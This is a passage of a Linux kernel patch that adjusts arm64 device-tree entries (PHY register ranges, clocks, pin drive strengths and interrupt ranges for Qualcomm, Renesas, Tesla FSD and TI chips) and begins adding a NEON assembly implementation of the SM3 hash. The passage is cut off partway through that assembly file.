+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x16c>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x16c>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+@@ -2455,7 +2455,7 @@
+ 					pins = "gpio7";
+ 					function = "dmic1_data";
+ 					drive-strength = <2>;
+-					pull-down;
++					bias-pull-down;
+ 					input-enable;
+ 				};
+ 			};
+@@ -2892,15 +2892,11 @@
+ 			dp_phy: dp-phy@88ea200 {
+ 				reg = <0 0x088ea200 0 0x200>,
+ 				      <0 0x088ea400 0 0x200>,
+-				      <0 0x088eac00 0 0x400>,
++				      <0 0x088eaa00 0 0x200>,
+ 				      <0 0x088ea600 0 0x200>,
+-				      <0 0x088ea800 0 0x200>,
+-				      <0 0x088eaa00 0 0x100>;
++				      <0 0x088ea800 0 0x200>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <1>;
+-				clocks = <&gcc GCC_USB3_PRIM_PHY_PIPE_CLK>;
+-				clock-names = "pipe0";
+-				clock-output-names = "usb3_phy_pipe_clk_src";
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index a86d9ea93b9d4..a6270d97a3192 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -2142,11 +2142,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x188>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x188>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts
+index d68765eb6d4f9..6351050bc87f2 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts
++++ b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara-pdx223.dts
+@@ -556,8 +556,6 @@
+ 	pinctrl-1 = <&sdc2_sleep_state &sdc2_card_det_n>;
+ 	vmmc-supply = <&pm8350c_l9>;
+ 	vqmmc-supply = <&pm8350c_l6>;
+-	/* Forbid SDR104/SDR50 - broken hw! */
+-	sdhci-caps-mask = <0x3 0x0>;
+ 	no-sdio;
+ 	no-mmc;
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index d32f08df743d8..32a37c878a34c 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -3161,11 +3161,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x188>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x188>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+@@ -3192,6 +3192,9 @@
+ 			bus-width = <4>;
+ 			dma-coherent;
+ 
++			/* Forbid SDR104/SDR50 - broken hw! */
++			sdhci-caps-mask = <0x3 0x0>;
++
+ 			status = "disabled";
+ 
+ 			sdhc2_opp_table: opp-table {
+diff --git a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+index c2f152bcf10ec..4092c0016035e 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+@@ -577,7 +577,7 @@
+ 			reg = <0 0xe6540000 0 0x60>;
+ 			interrupts = <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 514>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x31>, <&dmac0 0x30>,
+@@ -594,7 +594,7 @@
+ 			reg = <0 0xe6550000 0 0x60>;
+ 			interrupts = <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 515>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x33>, <&dmac0 0x32>,
+@@ -611,7 +611,7 @@
+ 			reg = <0 0xe6560000 0 0x60>;
+ 			interrupts = <GIC_SPI 247 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 516>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x35>, <&dmac0 0x34>,
+@@ -628,7 +628,7 @@
+ 			reg = <0 0xe66a0000 0 0x60>;
+ 			interrupts = <GIC_SPI 248 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 517>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x37>, <&dmac0 0x36>,
+@@ -657,7 +657,7 @@
+ 			reg = <0 0xe6e60000 0 64>;
+ 			interrupts = <GIC_SPI 249 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 702>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x51>, <&dmac0 0x50>,
+@@ -674,7 +674,7 @@
+ 			reg = <0 0xe6e68000 0 64>;
+ 			interrupts = <GIC_SPI 250 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 703>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x53>, <&dmac0 0x52>,
+@@ -691,7 +691,7 @@
+ 			reg = <0 0xe6c50000 0 64>;
+ 			interrupts = <GIC_SPI 252 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 704>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x57>, <&dmac0 0x56>,
+@@ -708,7 +708,7 @@
+ 			reg = <0 0xe6c40000 0 64>;
+ 			interrupts = <GIC_SPI 253 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 705>,
+-				 <&cpg CPG_CORE R8A779F0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779F0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			dmas = <&dmac0 0x59>, <&dmac0 0x58>,
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+index d70f0600ae5a9..d58b18802cb01 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+@@ -326,7 +326,7 @@
+ 			reg = <0 0xe6540000 0 96>;
+ 			interrupts = <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 514>,
+-				 <&cpg CPG_CORE R8A779G0_CLK_S0D3_PER>,
++				 <&cpg CPG_CORE R8A779G0_CLK_SASYNCPERD1>,
+ 				 <&scif_clk>;
+ 			clock-names = "fck", "brg_int", "scif_clk";
+ 			power-domains = <&sysc R8A779G0_PD_ALWAYS_ON>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a09g011.dtsi b/arch/arm64/boot/dts/renesas/r9a09g011.dtsi
+index fb1a97202c387..ebaa8cdd747d2 100644
+--- a/arch/arm64/boot/dts/renesas/r9a09g011.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a09g011.dtsi
+@@ -48,7 +48,7 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		gic: interrupt-controller@82000000 {
++		gic: interrupt-controller@82010000 {
+ 			compatible = "arm,gic-400";
+ 			#interrupt-cells = <3>;
+ 			#address-cells = <0>;
+@@ -126,7 +126,7 @@
+ 		i2c0: i2c@a4030000 {
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+-			compatible = "renesas,i2c-r9a09g011", "renesas,rzv2m-i2c";
++			compatible = "renesas,r9a09g011-i2c", "renesas,rzv2m-i2c";
+ 			reg = <0 0xa4030000 0 0x80>;
+ 			interrupts = <GIC_SPI 232 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 236 IRQ_TYPE_EDGE_RISING>;
+@@ -140,7 +140,7 @@
+ 		i2c2: i2c@a4030100 {
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+-			compatible = "renesas,i2c-r9a09g011", "renesas,rzv2m-i2c";
++			compatible = "renesas,r9a09g011-i2c", "renesas,rzv2m-i2c";
+ 			reg = <0 0xa4030100 0 0x80>;
+ 			interrupts = <GIC_SPI 234 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 238 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi b/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi
+index d0abb9aa0e9ed..e3852c9463528 100644
+--- a/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi
++++ b/arch/arm64/boot/dts/tesla/fsd-pinctrl.dtsi
+@@ -55,14 +55,14 @@
+ 		samsung,pins = "gpf5-0";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	ufs_refclk_out: ufs-refclk-out-pins {
+ 		samsung,pins = "gpf5-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ };
+ 
+@@ -239,105 +239,105 @@
+ 		samsung,pins = "gpb6-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	pwm1_out: pwm1-out-pins {
+ 		samsung,pins = "gpb6-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c0_bus: hs-i2c0-bus-pins {
+ 		samsung,pins = "gpb0-0", "gpb0-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c1_bus: hs-i2c1-bus-pins {
+ 		samsung,pins = "gpb0-2", "gpb0-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c2_bus: hs-i2c2-bus-pins {
+ 		samsung,pins = "gpb0-4", "gpb0-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c3_bus: hs-i2c3-bus-pins {
+ 		samsung,pins = "gpb0-6", "gpb0-7";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c4_bus: hs-i2c4-bus-pins {
+ 		samsung,pins = "gpb1-0", "gpb1-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c5_bus: hs-i2c5-bus-pins {
+ 		samsung,pins = "gpb1-2", "gpb1-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c6_bus: hs-i2c6-bus-pins {
+ 		samsung,pins = "gpb1-4", "gpb1-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c7_bus: hs-i2c7-bus-pins {
+ 		samsung,pins = "gpb1-6", "gpb1-7";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	uart0_data: uart0-data-pins {
+ 		samsung,pins = "gpb7-0", "gpb7-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	uart1_data: uart1-data-pins {
+ 		samsung,pins = "gpb7-4", "gpb7-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	spi0_bus: spi0-bus-pins {
+ 		samsung,pins = "gpb4-0", "gpb4-2", "gpb4-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	spi1_bus: spi1-bus-pins {
+ 		samsung,pins = "gpb4-4", "gpb4-6", "gpb4-7";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	spi2_bus: spi2-bus-pins {
+ 		samsung,pins = "gpb5-0", "gpb5-2", "gpb5-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/tesla/fsd-pinctrl.h b/arch/arm64/boot/dts/tesla/fsd-pinctrl.h
+index 6ffbda3624930..c397d02208a08 100644
+--- a/arch/arm64/boot/dts/tesla/fsd-pinctrl.h
++++ b/arch/arm64/boot/dts/tesla/fsd-pinctrl.h
+@@ -16,9 +16,9 @@
+ #define FSD_PIN_PULL_UP			3
+ 
+ #define FSD_PIN_DRV_LV1			0
+-#define FSD_PIN_DRV_LV2			2
+-#define FSD_PIN_DRV_LV3			1
+-#define FSD_PIN_DRV_LV4			3
++#define FSD_PIN_DRV_LV2			1
++#define FSD_PIN_DRV_LV4			2
++#define FSD_PIN_DRV_LV6			3
+ 
+ #define FSD_PIN_FUNC_INPUT		0
+ #define FSD_PIN_FUNC_OUTPUT		1
+diff --git a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+index 4005a73cfea99..ebb1c5ce7aece 100644
+--- a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+@@ -120,7 +120,6 @@
+ 		dmas = <&main_udmap 0xc001>, <&main_udmap 0x4002>,
+ 				<&main_udmap 0x4003>;
+ 		dma-names = "tx", "rx1", "rx2";
+-		dma-coherent;
+ 
+ 		rng: rng@4e10000 {
+ 			compatible = "inside-secure,safexcel-eip76";
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+index e5be78a58682d..d3fb86b2ea939 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+@@ -386,7 +386,6 @@
+ 		dmas = <&mcu_udmap 0xf501>, <&mcu_udmap 0x7502>,
+ 		       <&mcu_udmap 0x7503>;
+ 		dma-names = "tx", "rx1", "rx2";
+-		dma-coherent;
+ 
+ 		rng: rng@40910000 {
+ 			compatible = "inside-secure,safexcel-eip76";
+diff --git a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+index 917c9dc99efaa..603ddda5127fa 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+@@ -337,7 +337,6 @@
+ 		dmas = <&main_udmap 0xc000>, <&main_udmap 0x4000>,
+ 				<&main_udmap 0x4001>;
+ 		dma-names = "tx", "rx1", "rx2";
+-		dma-coherent;
+ 
+ 		rng: rng@4e10000 {
+ 			compatible = "inside-secure,safexcel-eip76";
+diff --git a/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi
+index 34e7d577ae13b..c89f28235812a 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi
+@@ -60,7 +60,7 @@
+ 		#interrupt-cells = <1>;
+ 		ti,sci = <&sms>;
+ 		ti,sci-dev-id = <148>;
+-		ti,interrupt-ranges = <8 360 56>;
++		ti,interrupt-ranges = <8 392 56>;
+ 	};
+ 
+ 	main_pmx0: pinctrl@11c000 {
+diff --git a/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi
+index 4d1bfabd1313a..f0644851602cd 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi
+@@ -65,7 +65,7 @@
+ 		#interrupt-cells = <1>;
+ 		ti,sci = <&sms>;
+ 		ti,sci-dev-id = <125>;
+-		ti,interrupt-ranges = <16 928 16>;
++		ti,interrupt-ranges = <16 960 16>;
+ 	};
+ 
+ 	mcu_conf: syscon@40f00000 {
+diff --git a/arch/arm64/crypto/Kconfig b/arch/arm64/crypto/Kconfig
+index 8bd80508a710d..4b121dc0cfba2 100644
+--- a/arch/arm64/crypto/Kconfig
++++ b/arch/arm64/crypto/Kconfig
+@@ -96,6 +96,17 @@ config CRYPTO_SHA3_ARM64
+ 	  Architecture: arm64 using:
+ 	  - ARMv8.2 Crypto Extensions
+ 
++config CRYPTO_SM3_NEON
++	tristate "Hash functions: SM3 (NEON)"
++	depends on KERNEL_MODE_NEON
++	select CRYPTO_HASH
++	select CRYPTO_SM3
++	help
++	  SM3 (ShangMi 3) secure hash function (OSCCA GM/T 0004-2012)
++
++	  Architecture: arm64 using:
++	  - NEON (Advanced SIMD) extensions
++
+ config CRYPTO_SM3_ARM64_CE
+ 	tristate "Hash functions: SM3 (ARMv8.2 Crypto Extensions)"
+ 	depends on KERNEL_MODE_NEON
+diff --git a/arch/arm64/crypto/Makefile b/arch/arm64/crypto/Makefile
+index 24bb0c4610de2..087f1625e7751 100644
+--- a/arch/arm64/crypto/Makefile
++++ b/arch/arm64/crypto/Makefile
+@@ -17,6 +17,9 @@ sha512-ce-y := sha512-ce-glue.o sha512-ce-core.o
+ obj-$(CONFIG_CRYPTO_SHA3_ARM64) += sha3-ce.o
+ sha3-ce-y := sha3-ce-glue.o sha3-ce-core.o
+ 
++obj-$(CONFIG_CRYPTO_SM3_NEON) += sm3-neon.o
++sm3-neon-y := sm3-neon-glue.o sm3-neon-core.o
++
+ obj-$(CONFIG_CRYPTO_SM3_ARM64_CE) += sm3-ce.o
+ sm3-ce-y := sm3-ce-glue.o sm3-ce-core.o
+ 
+diff --git a/arch/arm64/crypto/sm3-neon-core.S b/arch/arm64/crypto/sm3-neon-core.S
+new file mode 100644
+index 0000000000000..4357e0e51be38
+--- /dev/null
++++ b/arch/arm64/crypto/sm3-neon-core.S
+@@ -0,0 +1,601 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * sm3-neon-core.S - SM3 secure hash using NEON instructions
++ *
++ * Linux/arm64 port of the libgcrypt SM3 implementation for AArch64
++ *
++ * Copyright (C) 2021 Jussi Kivilinna <jussi.kivilinna@iki.fi>
++ * Copyright (c) 2022 Tianjia Zhang <tianjia.zhang@linux.alibaba.com>
++ */
++
++#include <linux/linkage.h>
++#include <linux/cfi_types.h>
++#include <asm/assembler.h>
++
++/* Context structure */
++
++#define state_h0 0
++#define state_h1 4
++#define state_h2 8
++#define state_h3 12
++#define state_h4 16
++#define state_h5 20
++#define state_h6 24
++#define state_h7 28
++
++/* Stack structure */
++
++#define STACK_W_SIZE        (32 * 2 * 3)
++
++#define STACK_W             (0)
++#define STACK_SIZE          (STACK_W + STACK_W_SIZE)
++
++/* Register macros */
++
++#define RSTATE x0
++#define RDATA  x1
++#define RNBLKS x2
++#define RKPTR  x28
++#define RFRAME x29
++
++#define ra w3
++#define rb w4
++#define rc w5
++#define rd w6
++#define re w7
++#define rf w8
++#define rg w9
++#define rh w10
++
++#define t0 w11
++#define t1 w12
++#define t2 w13
++#define t3 w14
++#define t4 w15
++#define t5 w16
++#define t6 w17
++
++#define k_even w19
++#define k_odd w20
++
++#define addr0 x21
++#define addr1 x22
++
++#define s0 w23
++#define s1 w24
++#define s2 w25
++#define s3 w26
++
++#define W0 v0
++#define W1 v1
++#define W2 v2
++#define W3 v3
++#define W4 v4
++#define W5 v5
++
++#define XTMP0 v6
++#define XTMP1 v7
++#define XTMP2 v16
++#define XTMP3 v17
++#define XTMP4 v18
++#define XTMP5 v19
++#define XTMP6 v20
++
++/* Helper macros. */
++
++#define _(...) /*_*/
++
++#define clear_vec(x) \
++	movi	x.8h, #0;
++
++#define rolw(o, a, n) \
++	ror	o, a, #(32 - n);
++
++/* Round function macros. */
++
++#define GG1_1(x, y, z, o, t) \
++	eor	o, x, y;
++#define GG1_2(x, y, z, o, t) \
++	eor	o, o, z;
++#define GG1_3(x, y, z, o, t)
++
++#define FF1_1(x, y, z, o, t) GG1_1(x, y, z, o, t)
++#define FF1_2(x, y, z, o, t)
++#define FF1_3(x, y, z, o, t) GG1_2(x, y, z, o, t)
++
++#define GG2_1(x, y, z, o, t) \
++	bic	o, z, x;
++#define GG2_2(x, y, z, o, t) \
++	and	t, y, x;
++#define GG2_3(x, y, z, o, t) \
++	eor	o, o, t;
++
++#define FF2_1(x, y, z, o, t) \
++	eor	o, x, y;
++#define FF2_2(x, y, z, o, t) \
++	and	t, x, y; \
++	and	o, o, z;
++#define FF2_3(x, y, z, o, t) \
++	eor	o, o, t;
++
++#define R(i, a, b, c, d, e, f, g, h, k, K_LOAD, round, widx, wtype, IOP, iop_param) \
++	K_LOAD(round);                                                        \
++	ldr	t5, [sp, #(wtype##_W1_ADDR(round, widx))];                    \
++	rolw(t0, a, 12);                              /* rol(a, 12) => t0 */  \
++      IOP(1, iop_param);                                                      \
++	FF##i##_1(a, b, c, t1, t2);                                           \
++	ldr	t6, [sp, #(wtype##_W1W2_ADDR(round, widx))];                  \
++	add	k, k, e;                                                      \
++      IOP(2, iop_param);                                                      \
++	GG##i##_1(e, f, g, t3, t4);                                           \
++	FF##i##_2(a, b, c, t1, t2);                                           \
++      IOP(3, iop_param);                                                      \
++	add	k, k, t0;                                                     \
++	add	h, h, t5;                                                     \
++	add	d, d, t6;                     /* w1w2 + d => d */             \
++      IOP(4, iop_param);                                                      \
++	rolw(k, k, 7);                        /* rol(t0 + e + t, 7) => k */   \
++	GG##i##_2(e, f, g, t3, t4);                                           \
++	add	h, h, k;                      /* h + w1 + k => h */           \
++      IOP(5, iop_param);                                                      \
++	FF##i##_3(a, b, c, t1, t2);                                           \
++	eor	t0, t0, k;                    /* k ^ t0 => t0 */              \
++	GG##i##_3(e, f, g, t3, t4);                                           \
++	add	d, d, t1;                     /* FF(a,b,c) + d => d */        \
++      IOP(6, iop_param);                                                      \
++	add	t3, t3, h;                    /* GG(e,f,g) + h => t3 */       \
++	rolw(b, b, 9);                        /* rol(b, 9) => b */            \
++	eor	h, t3, t3, ror #(32-9);                                       \
++      IOP(7, iop_param);                                                      \
++	add	d, d, t0;                     /* t0 + d => d */               \
++	rolw(f, f, 19);                       /* rol(f, 19) => f */           \
++      IOP(8, iop_param);                                                      \
++	eor	h, h, t3, ror #(32-17);       /* P0(t3) => h */
++
++#define R1(a, b, c, d, e, f, g, h, k, K_LOAD, round, widx, wtype, IOP, iop_param) \
++	R(1, ##a, ##b, ##c, ##d, ##e, ##f, ##g, ##h, ##k, K_LOAD, round, widx, wtype, IOP, iop_param)
++
++#define R2(a, b, c, d, e, f, g, h, k, K_LOAD, round, widx, wtype, IOP, iop_param) \
++	R(2, ##a, ##b, ##c, ##d, ##e, ##f, ##g, ##h, ##k, K_LOAD, round, widx, wtype, IOP, iop_param)
++
++#define KL(round) \
++	ldp	k_even, k_odd, [RKPTR, #(4*(round))];
++
++/* Input expansion macros. */
++
++/* Byte-swapped input address. */
++#define IW_W_ADDR(round, widx, offs) \
++	(STACK_W + ((round) / 4) * 64 + (offs) + ((widx) * 4))
++
++/* Expanded input address. */
++#define XW_W_ADDR(round, widx, offs) \
++	(STACK_W + ((((round) / 3) - 4) % 2) * 64 + (offs) + ((widx) * 4))
++
++/* Rounds 1-12, byte-swapped input block addresses. */
++#define IW_W1_ADDR(round, widx)   IW_W_ADDR(round, widx, 32)
++#define IW_W1W2_ADDR(round, widx) IW_W_ADDR(round, widx, 48)
++
++/* Rounds 1-12, expanded input block addresses. */
++#define XW_W1_ADDR(round, widx)   XW_W_ADDR(round, widx, 0)
++#define XW_W1W2_ADDR(round, widx) XW_W_ADDR(round, widx, 16)
++
++/* Input block loading.
++ * Interleaving within round function needed for in-order CPUs. */
++#define LOAD_W_VEC_1_1() \
++	add	addr0, sp, #IW_W1_ADDR(0, 0);
++#define LOAD_W_VEC_1_2() \
